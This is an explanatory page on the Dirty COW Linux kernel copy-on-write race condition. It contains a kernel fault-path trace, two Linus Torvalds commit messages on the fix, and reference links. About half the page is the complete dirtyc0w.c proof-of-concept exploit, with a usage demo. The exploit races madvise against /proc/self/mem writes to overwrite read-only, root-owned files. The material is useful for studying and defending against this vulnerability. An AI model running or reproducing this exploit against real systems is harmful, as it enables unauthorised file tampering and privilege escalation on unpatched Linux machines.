A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. All the information we have so far is included in this page.
The bug has existed since around 2.6.22 (released in 2007) and was fixed on Oct 18, 2016.
There are proof of concept available here.
faultin_page
handle_mm_fault
__handle_mm_fault
handle_pte_fault
do_fault <- pte is not present
do_cow_fault <- FAULT_FLAG_WRITE
alloc_set_pte
maybe_mkwrite(pte_mkdirty(entry), vma) <- mark the page dirty
but keep it RO
# Returns with 0 and retry
follow_page_mask
follow_page_pte
(flags & FOLL_WRITE) && !pte_write(pte) <- retry fault
faultin_page
handle_mm_fault
__handle_mm_fault
handle_pte_fault
FAULT_FLAG_WRITE && !pte_write
do_wp_page
PageAnon() <- this is CoWed page already
reuse_swap_page <- page is exclusively ours
wp_page_reuse
maybe_mkwrite <- dirty but RO again
ret = VM_FAULT_WRITE
((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE)) <- we drop FOLL_WRITE
#Returns with 0 and retry as a read fault
cond_resched -> different thread will now unmap via madvise
follow_page_mask
!pte_present && pte_none
faultin_page
handle_mm_fault
__handle_mm_fault
handle_pte_fault
do_fault <- pte is not present
do_read_fault <- this is a read fault and we will get pagecache
page!
commit 4ceb5db9757aaeadcf8fbbf97d76bd42aa4df0d6
Author: Linus Torvalds <[email protected]>
Date: Mon Aug 1 11:14:49 2005 -0700
Fix get_user_pages() race for write access
There's no real guarantee that handle_mm_fault() will always be able to
break a COW situation - if an update from another thread ends up
modifying the page table some way, handle_mm_fault() may end up
requiring us to re-try the operation.
That's normally fine, but get_user_pages() ended up re-trying it as a
read, and thus a write access could in theory end up losing the dirty
bit or be done on a page that had not been properly COW'ed.
This makes get_user_pages() always retry write accesses as write
accesses by making "follow_page()" require that a writable follow has
the dirty bit set. That simplifies the code and solves the race: if the
COW break fails for some reason, we'll just loop around and try again.
commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619
Author: Linus Torvalds <[email protected]>
Date: Thu Oct 13 20:07:36 2016 GMT
This is an ancient bug that was actually attempted to be fixed once
(badly) by me eleven years ago in commit 4ceb5db9757a ("Fix
get_user_pages() race for write access") but that was then undone due to
problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug").
In the meantime, the s390 situation has long been fixed, and we can now
fix it by checking the pte_dirty() bit properly (and do it better). The
s390 dirty bit was implemented in abf09bed3cce ("s390/mm: implement
software dirty bits") which made it into v3.9. Earlier kernels will
have to look at the page state itself.
Also, the VM has become more scalable, and what used a purely
theoretical race back then has become easier to trigger.
To fix it, we introduce a new internal FOLL_COW flag to mark the "yes,
we already did a COW" rather than play racy games with FOLL_WRITE that
is very fundamental, and then use the pte dirty flag to validate that
the FOLL_COW flag is still valid.
https://dirtycow.ninja
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
https://bugzilla.redhat.com/show_bug.cgi?id=1384344
https://access.redhat.com/security/vulnerabilities/2706661
https://plus.google.com/+KeesCook/posts/UUaXm3PcQ4n
https://twitter.com/nelhage/status/789196293629370368
https://bugzilla.suse.com/show_bug.cgi?id=1004418#c14
/*
####################### dirtyc0w.c #######################
# 更多详情见:https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
void *map;
int f;
struct stat st;
char *name;
void *madviseThread(void *arg)
{
char *str;
str=(char*)arg;
int i,c=0;
for(i=0;i<100000000;i++)
{
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
c+=madvise(map,100,MADV_DONTNEED);
}
printf("madvise %d\n\n",c);
}
void *procselfmemThread(void *arg)
{
char *str;
str=(char*)arg;
/*
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
> The in the wild exploit we are aware of doesn't work on Red Hat
> Enterprise Linux 5 and 6 out of the box because on one side of
> the race it writes to /proc/self/mem, but /proc/self/mem is not
> writable on Red Hat Enterprise Linux 5 and 6.
*/
int f=open("/proc/self/mem",O_RDWR);
int i,c=0;
for(i=0;i<100000000;i++) {
/*
You have to reset the file pointer to the memory position.
*/
lseek(f,(uintptr_t) map,SEEK_SET);
c+=write(f,str,strlen(str));
}
printf("procselfmem %d\n\n", c);
}
int main(int argc,char *argv[])
{
/*
You have to pass two arguments. File and Contents.
*/
if (argc<3) {
(void)fprintf(stderr, "%s\n",
"usage: dirtyc0w target_file new_content");
return 1; }
pthread_t pth1,pth2;
/*
You have to open the file in read only mode.
*/
f=open(argv[1],O_RDONLY);
fstat(f,&st);
name=argv[1];
/*
You have to use MAP_PRIVATE for copy-on-write mapping.
> Create a private copy-on-write mapping. Updates to the
> mapping are not visible to other processes mapping the same
> file, and are not carried through to the underlying file. It
> is unspecified whether changes made to the file after the
> mmap() call are visible in the mapped region.
*/
/*
You have to open with PROT_READ.
*/
map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
printf("mmap %zx\n\n",(uintptr_t) map);
/*
You have to do it on two threads.
*/
pthread_create(&pth1,NULL,madviseThread,argv[1]);
pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
/*
You have to wait for the threads to finish.
*/
pthread_join(pth1,NULL);
pthread_join(pth2,NULL);
return 0;
}